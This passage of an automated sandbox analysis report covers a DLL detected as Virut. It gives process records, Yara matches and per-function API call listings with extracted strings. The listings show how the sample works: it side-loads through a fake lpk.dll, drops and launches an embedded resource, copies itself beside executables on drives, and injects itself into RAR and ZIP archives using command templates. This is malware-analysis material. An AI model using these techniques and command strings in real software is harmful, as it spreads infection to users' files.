Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.2742966295.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.2743612981.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	09:33:32
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.2744408295.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.2743091000.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	09:33:33
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000002.2745114770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000000.1572545222.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000002.2743852596.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	09:33:33
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000002A.00000002.2741956104.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000002A.00000002.2742967559.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	32.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.4%
Total number of Nodes:	138
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 10001193 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 104
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000066,0000000A,?,00000001), ref: 100011AD
SizeofResource.KERNEL32(00000000,?,00000001), ref: 100011C4
LoadResource.KERNEL32(00000000,?,00000001), ref: 100011D4
LockResource.KERNEL32(00000000,?,00000001), ref: 100011EC
GetTempPathW.KERNEL32(00000104,?,?,?,00000001), ref: 1000120A
GetTempFileNameW.KERNELBASE(?,hrl,00000000,?,?,?,00000001), ref: 1000121E
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,?,?,00000001), ref: 10001239
WriteFile.KERNELBASE(00000000,?,00000001,?,00000000,?,?,00000001), ref: 10001255
CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 10001265
RtlZeroMemory.KERNEL32(?,00000044,?,?,00000001), ref: 10001272
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 1000129E
CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012AE
CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012B3

Strings

hrl, xrefs: 10001218
D, xrefs: 10001294

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Resource$CloseFileHandle$CreateTemp$FindLoadLockMemoryNamePathProcessSizeofWriteZero
String ID: D$hrl
API String ID: 3860286866-1539874146
Opcode ID: 4d7fa836e7c1b89c7a2dc873b2d0427aa4d1f5576468e1d68e679cf7da32b867
Instruction ID: 7e218033b22d9d8325d54e1b04e0e1002b9ec3418c8ade03e82d96821e86f301
Opcode Fuzzy Hash: 4d7fa836e7c1b89c7a2dc873b2d0427aa4d1f5576468e1d68e679cf7da32b867
Instruction Fuzzy Hash: 0A31E8B1D01228ABEB11EFA0CC8CEEE7BBDEB49791F104566F605E2165D7344A54CB60

Function 10001A32 Relevance: 10.6, APIs: 7, Instructions: 55
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000001,10003018,00000104), ref: 10001A4F
DisableThreadLibraryCalls.KERNEL32(00000001), ref: 10001A56

Part of subcall function 10001134: FindResourceW.KERNEL32(00000065,0000000A,00000001,?,10001A61), ref: 10001142
Part of subcall function 10001134: SizeofResource.KERNEL32(00000000,?,?,10001A61), ref: 10001156
Part of subcall function 10001134: LoadResource.KERNEL32(00000000,?,?,10001A61), ref: 10001165
Part of subcall function 10001134: LockResource.KERNEL32(00000000,?,?,10001A61), ref: 10001174
Part of subcall function 10001134: lstrcpynA.KERNEL32(10003220,00000000,00000020,?,?,10001A61), ref: 10001186

Part of subcall function 10001338: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1000134F
Part of subcall function 10001338: PathFindFileNameW.SHLWAPI(?), ref: 1000135C
Part of subcall function 10001338: PathFindExtensionW.SHLWAPI(00000000), ref: 10001377
Part of subcall function 10001338: lstrcmpiW.KERNEL32(00000000,.TMP), ref: 10001387

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10001A8E

Part of subcall function 100012BD: CreateMutexA.KERNELBASE(00000000,00000000,10003220,?,10001A74), ref: 100012C7

Part of subcall function 10001193: FindResourceW.KERNEL32(00000066,0000000A,?,00000001), ref: 100011AD
Part of subcall function 10001193: SizeofResource.KERNEL32(00000000,?,00000001), ref: 100011C4
Part of subcall function 10001193: LoadResource.KERNEL32(00000000,?,00000001), ref: 100011D4
Part of subcall function 10001193: LockResource.KERNEL32(00000000,?,00000001), ref: 100011EC
Part of subcall function 10001193: GetTempPathW.KERNEL32(00000104,?,?,?,00000001), ref: 1000120A
Part of subcall function 10001193: GetTempFileNameW.KERNELBASE(?,hrl,00000000,?,?,?,00000001), ref: 1000121E
Part of subcall function 10001193: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,?,?,00000001), ref: 10001239
Part of subcall function 10001193: WriteFile.KERNELBASE(00000000,?,00000001,?,00000000,?,?,00000001), ref: 10001255
Part of subcall function 10001193: CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 10001265
Part of subcall function 10001193: RtlZeroMemory.KERNEL32(?,00000044,?,?,00000001), ref: 10001272
Part of subcall function 10001193: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 1000129E
Part of subcall function 10001193: CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012AE
Part of subcall function 10001193: CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012B3

SetEvent.KERNEL32(?), ref: 10001ABA
WaitForSingleObject.KERNEL32(000000FF), ref: 10001AC8
CloseHandle.KERNEL32 ref: 10001ADA
CloseHandle.KERNEL32 ref: 10001AE2

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Resource$File$CloseHandle$CreateFindName$Path$EventLoadLockModuleSizeofTemp$CallsDisableExtensionLibraryMemoryMutexObjectProcessSingleThreadWaitWriteZerolstrcmpilstrcpyn
String ID:
API String ID: 3535865480-0
Opcode ID: 9463e6314e2ffea4b211b81d2ab195e89bd7a5a57881afda2ee0c205d14b84f9
Instruction ID: ffd36879a7497b368e77efcd0eb173f2275a3137c17b7fd903d544f692c8100a
Opcode Fuzzy Hash: 9463e6314e2ffea4b211b81d2ab195e89bd7a5a57881afda2ee0c205d14b84f9
Instruction Fuzzy Hash: 78115B34606332AAF612EBA18C89BCF3BACEF023E5F118116F554D10ADDB609950CA63

Function 100010CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 100010E3
lstrcatW.KERNEL32(?,\lpk), ref: 100010F5
LoadLibraryW.KERNELBASE(?), ref: 10001102

Part of subcall function 1000101F: RtlMoveMemory.KERNEL32(10003250,00000000,LpkEditControl,00000040,LpkDrawTextEx,LpkDllInitialize,LpkTabbedTextOut,10001116), ref: 1000105E

Strings

\lpk, xrefs: 100010E9

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: DirectoryLibraryLoadMemoryMoveSystemlstrcat
String ID: \lpk
API String ID: 3372298440-336436324
Opcode ID: da33033e2e221ff141f50507f8a04e5c7ee6db60748155a8461eceed5cf1bc2c
Instruction ID: be4007e3f20e417fa77d5d5c324e07ec6705456ad939ec99c1b7038da3bba866
Opcode Fuzzy Hash: da33033e2e221ff141f50507f8a04e5c7ee6db60748155a8461eceed5cf1bc2c
Instruction Fuzzy Hash: B2E0127480032A9BFB50EBB08C8EAC777BCE704381F000562E755D206AEF74D585CB50

Function 100012F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00000104), ref: 10001311
PathFindFileNameW.SHLWAPI(?), ref: 1000131E
lstrcmpiW.KERNELBASE(00000000,lpk.dll), ref: 1000132A

Strings

lpk.dll, xrefs: 10001324

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FileName$FindModulePathlstrcmpi
String ID: lpk.dll
API String ID: 1239673384-3066363995
Opcode ID: 6ddba052437873c055f84e44d424d8da0386140e72b76d5d1097730297a1a48a
Instruction ID: 2c49bb99bc8642171fc9961312980d4ab0a4eef97db440158d685f58edb63067
Opcode Fuzzy Hash: 6ddba052437873c055f84e44d424d8da0386140e72b76d5d1097730297a1a48a
Instruction Fuzzy Hash: 35E0127554032D6BEB116B70CC8DDD7376CA700745F004251F65AD20BADA74958DCF50

Function 100019E6 Relevance: 6.0, APIs: 4, Instructions: 25
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,100018D3,00000000,00000004,00000000), ref: 100019F4
SetThreadPriority.KERNELBASE(00000000,000000F1), ref: 10001A02
ResumeThread.KERNELBASE ref: 10001A12
TerminateThread.KERNEL32(00000000), ref: 10001A24

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Thread$CreatePriorityResumeTerminate
String ID:
API String ID: 2154424394-0
Opcode ID: 3913cdfa09b60b7149b9d1de93706da214591cc2ab76757be7511d577559ebbf
Instruction ID: e961737a7aae76fd0c4580525259ff7f5de2b8d71232f79ea42e210bb63285d4
Opcode Fuzzy Hash: 3913cdfa09b60b7149b9d1de93706da214591cc2ab76757be7511d577559ebbf
Instruction Fuzzy Hash: AFE07570502230BAFA119B769C8CB873F6AEB076F1B554316F62E915BAC7204581CBA1

Function 100012BD Relevance: 4.5, APIs: 3, Instructions: 24
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000000,10003220,?,10001A74), ref: 100012C7
GetLastError.KERNEL32(00000001,?,10001A74), ref: 100012D7
CloseHandle.KERNELBASE(00000000,?,10001A74), ref: 100012EB

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 679afb9bc1ba41874d318fcbe5ee5d611c016a16ab61a98bcb540af40b34feda
Instruction ID: 226164d0f01b805de613a55782abc57cedde5fe5c7c82aa8690d380dee59acf0
Opcode Fuzzy Hash: 679afb9bc1ba41874d318fcbe5ee5d611c016a16ab61a98bcb540af40b34feda
Instruction Fuzzy Hash: 1BD05E3660873067F212937CBC0CB8F2A35EBC5BF2F128265FE4AD229CCB24490685D5

Function 10001000 Relevance: 3.0, APIs: 2, Instructions: 8
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(10001116,10001029), ref: 1000100A
ExitProcess.KERNEL32 ref: 10001016

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressExitProcProcess
String ID:
API String ID: 2796388413-0
Opcode ID: d6c54ef09a1c41390c756e13bcc0c54c78fbecb98ee2d0f10b5980c889cfc44d
Instruction ID: 5188076986118a0aee3e910be33b50d7ca781def4220dbbbf73b176a37f9c490
Opcode Fuzzy Hash: d6c54ef09a1c41390c756e13bcc0c54c78fbecb98ee2d0f10b5980c889cfc44d
Instruction Fuzzy Hash: F6C04C35104261ABFA11AB618E8CB067B66AB547D1B114215E255800BED6318450EA15

Non-executed Functions

Function 10001677 Relevance: 54.4, APIs: 26, Strings: 5, Instructions: 172
stringfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 1000168F
lstrcpyW.KERNEL32(?,A:\,0000EA60,753C73E0), ref: 100016C2
lstrcpyW.KERNEL32(?,?), ref: 100016DF
PathAppendW.SHLWAPI(?,10002374), ref: 100016F3
FindFirstFileW.KERNEL32(?,?), ref: 10001703
PathFindExtensionW.SHLWAPI(?), ref: 100017CA
lstrcmpiW.KERNEL32(00000000,.EXE), ref: 100017E1
lstrcpyW.KERNEL32(?,?), ref: 100017F5
PathAppendW.SHLWAPI(?,lpk.dll), ref: 10001803
GetFileAttributesW.KERNEL32(?), ref: 1000180C
CopyFileW.KERNEL32(10003018,?,00000001), ref: 10001829
SetFileAttributesW.KERNEL32(?,00000007), ref: 10001838
lstrcmpiW.KERNEL32(100015A2,.RAR), ref: 10001846
lstrcmpiW.KERNEL32(100015A2,.ZIP), ref: 10001854
lstrcpyW.KERNEL32(?,?), ref: 1000187D
PathAppendW.SHLWAPI(?,?), ref: 1000188D
WaitForSingleObject.KERNEL32(00000014), ref: 100018A4
FindNextFileW.KERNEL32(100015A2,?), ref: 100018BF

Strings

.RAR, xrefs: 1000183E
.EXE, xrefs: 100017DB
lpk.dll, xrefs: 100017F7
A:\, xrefs: 100016BC
.ZIP, xrefs: 1000184C

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: File$Pathlstrcpy$AppendFindlstrcmpi$AttributesObjectSingleWait$CopyExtensionFirstNext
String ID: .EXE$.RAR$.ZIP$A:\$lpk.dll
API String ID: 3771388200-3932496361
Opcode ID: c6fda171f6056316e2428e6f33dc1771b38d5d81fbede9409986d606e9291121
Instruction ID: 14b84c573bc6bfc0103a48903cae28372ea9a580d345985b263a6e171d24a783
Opcode Fuzzy Hash: c6fda171f6056316e2428e6f33dc1771b38d5d81fbede9409986d606e9291121
Instruction Fuzzy Hash: 5651DDB290022DAAEB10DBA4CC88BDE77BDEB44390F1445A6E605E2055DB75DB84CFA0

Function 1000142B Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 129
stringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHRegGetValueW.SHLWAPI(80000000,WinRAR\shell\open\command,00000000,00000002,00000000,?,?), ref: 10001456
lstrcpyW.KERNEL32(00000022,?), ref: 10001485
StrStrIW.SHLWAPI(00000022,1000230C), ref: 10001498
PathRemoveFileSpecW.SHLWAPI(00000022), ref: 100014B2
PathAppendW.SHLWAPI(00000022,rar.exe), ref: 100014C4
GetFileAttributesW.KERNEL32(00000022), ref: 100014D1
PathGetShortPath.SHELL32(00000022), ref: 100014E9
GetTempPathW.KERNEL32(00000104,?), ref: 100014FB
GetCurrentThreadId.KERNEL32 ref: 10001508
GetTempFileNameW.KERNEL32(?,IRAR,00000000), ref: 1000151B
wsprintfW.USER32 ref: 10001544

Part of subcall function 10001398: RtlZeroMemory.KERNEL32(?,00000044), ref: 100013A7
Part of subcall function 10001398: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100013D1
Part of subcall function 10001398: GetLastError.KERNEL32 ref: 100013DB

wsprintfW.USER32 ref: 10001580

Part of subcall function 10001398: WaitForSingleObject.KERNEL32(?,?), ref: 100013E9
Part of subcall function 10001398: TerminateProcess.KERNEL32(?,000005B4), ref: 100013FB
Part of subcall function 10001398: GetExitCodeProcess.KERNEL32(?,?), ref: 1000140F
Part of subcall function 10001398: CloseHandle.KERNEL32(?), ref: 1000141E
Part of subcall function 10001398: CloseHandle.KERNEL32(?), ref: 10001423

Part of subcall function 10001677: WaitForSingleObject.KERNEL32(00000000), ref: 1000168F

wsprintfW.USER32 ref: 100015C0
wsprintfW.USER32 ref: 100015E6

Strings

"%s" x "%s" *.exe "%s\", xrefs: 1000157A
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll", xrefs: 1000153E
WinRAR\shell\open\command, xrefs: 10001445
cmd /c RD /s /q "%s", xrefs: 100015E0
rar.exe, xrefs: 100014B8
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll", xrefs: 100015BA
IRAR, xrefs: 1000150F
", xrefs: 10001464
s<u, xrefs: 10001521

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Path$wsprintf$FileProcess$CloseHandleObjectSingleTempWait$AppendAttributesCodeCreateCurrentErrorExitLastMemoryNameRemoveShortSpecTerminateThreadValueZerolstrcpy
String ID: "$"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"$"%s" x "%s" *.exe "%s\"$IRAR$WinRAR\shell\open\command$cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"$cmd /c RD /s /q "%s"$rar.exe$s<u
API String ID: 2025278562-1424356315
Opcode ID: 142c22ba32e87d5e21e1317ff34b13b051766c503af886549bf79c5699618864
Instruction ID: 53c986b37aabe2969284ac0dd55f15aa40eaa0efec7de0ac8071c71bfebae4df
Opcode Fuzzy Hash: 142c22ba32e87d5e21e1317ff34b13b051766c503af886549bf79c5699618864
Instruction Fuzzy Hash: 1041C4B690021DAAEF10DB90CD48EDA77BCEB44340F1045A2B619D6055E674EB85CFB1

Function 1000101F Relevance: 21.0, APIs: 1, Strings: 11, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001000: GetProcAddress.KERNEL32(10001116,10001029), ref: 1000100A
Part of subcall function 10001000: ExitProcess.KERNEL32 ref: 10001016

RtlMoveMemory.KERNEL32(10003250,00000000,LpkEditControl,00000040,LpkDrawTextEx,LpkDllInitialize,LpkTabbedTextOut,10001116), ref: 1000105E

Strings

LpkDrawTextEx, xrefs: 10001038
LpkGetTextExtentExPoint, xrefs: 1000107D
LpkEditControl, xrefs: 10001049
LpkPSMTextOut, xrefs: 1000109B
LpkInitialize, xrefs: 1000108C
ftsWordBreak, xrefs: 100010B9
LpkUseGDIWidthCache, xrefs: 100010AA
LpkExtTextOut, xrefs: 10001064
LpkTabbedTextOut, xrefs: 1000101F
LpkGetCharacterPlacement, xrefs: 1000106E
LpkDllInitialize, xrefs: 10001029

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressExitMemoryMoveProcProcess
String ID: LpkDllInitialize$LpkDrawTextEx$LpkEditControl$LpkExtTextOut$LpkGetCharacterPlacement$LpkGetTextExtentExPoint$LpkInitialize$LpkPSMTextOut$LpkTabbedTextOut$LpkUseGDIWidthCache$ftsWordBreak
API String ID: 598812106-3128392633
Opcode ID: 7b87169acbeb48b0e10738be1b64164151dc3c35c96d6f7d10ce1f3cc01630ac
Instruction ID: aa075801c4fef1efc4910219ef897301fe87f4caca160f87edb01903a9b0afcb
Opcode Fuzzy Hash: 7b87169acbeb48b0e10738be1b64164151dc3c35c96d6f7d10ce1f3cc01630ac
Instruction Fuzzy Hash: 48015474C0239065FB27EFB14D95BCA3B54E7196C1F10C515F3446712EDBB470849B59

Function 100018D3 Relevance: 16.6, APIs: 11, Instructions: 100
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.KERNEL32(?,00000060), ref: 100018E6
DriveType.SHELL32(00000002), ref: 10001902
CreateThread.KERNEL32(00000000,00000000,10001677,00000002,00000004,00000000), ref: 1000191D
SetThreadPriority.KERNEL32(00000000,000000F1), ref: 10001930
ResumeThread.KERNEL32(?), ref: 1000193D
TerminateThread.KERNEL32(?,00000000), ref: 10001956
WaitForMultipleObjects.KERNEL32(00000000,?,00000001,00000000), ref: 10001975
RtlZeroMemory.KERNEL32(?,00000060), ref: 10001989
CloseHandle.KERNEL32(?), ref: 10001997
WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 100019C0
CloseHandle.KERNEL32(?), ref: 100019D0

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Thread$CloseHandleMemoryMultipleObjectsWaitZero$CreateDrivePriorityResumeTerminateType
String ID:
API String ID: 1898017378-0
Opcode ID: 71ecf636f0081dbd197aaeebedbcf1e6d536c32a25ba8b4cc3754e929457f104
Instruction ID: a0013d5da517d4d5a33f6e42946cb667d24e2e6983c8dbf7389f749baf9380a9
Opcode Fuzzy Hash: 71ecf636f0081dbd197aaeebedbcf1e6d536c32a25ba8b4cc3754e929457f104
Instruction Fuzzy Hash: A631B671540721ABF712EB20CC98BAB7BEEEF807D0F500615F6A6D10A9C772C945C762

Function 10001398 Relevance: 12.1, APIs: 8, Instructions: 54
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.KERNEL32(?,00000044), ref: 100013A7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100013D1
GetLastError.KERNEL32 ref: 100013DB
WaitForSingleObject.KERNEL32(?,?), ref: 100013E9
TerminateProcess.KERNEL32(?,000005B4), ref: 100013FB
GetExitCodeProcess.KERNEL32(?,?), ref: 1000140F
CloseHandle.KERNEL32(?), ref: 1000141E
CloseHandle.KERNEL32(?), ref: 10001423

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Process$CloseHandle$CodeCreateErrorExitLastMemoryObjectSingleTerminateWaitZero
String ID:
API String ID: 479851863-0
Opcode ID: 3ed73109c565a90064a559c7f12dc2adb11bdd3152a3d3fb5de7734ac646d6f3
Instruction ID: 7f4f93b674e2ec955674b2195e50ebeabb8675a41d593902dc04bf7fa736d272
Opcode Fuzzy Hash: 3ed73109c565a90064a559c7f12dc2adb11bdd3152a3d3fb5de7734ac646d6f3
Instruction Fuzzy Hash: 4411E271900229EBEB01EFE1CD88ADE7FB9EF08791F104011EA05A6169D6319A54DBA1

Function 10001606 Relevance: 9.0, APIs: 6, Instructions: 43
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 1000160C
GetTickCount.KERNEL32 ref: 1000161C
WaitForSingleObject.KERNEL32(00001388,?,?,100019A9), ref: 10001634
GetTickCount.KERNEL32 ref: 1000163D
GetLogicalDrives.KERNEL32 ref: 10001650
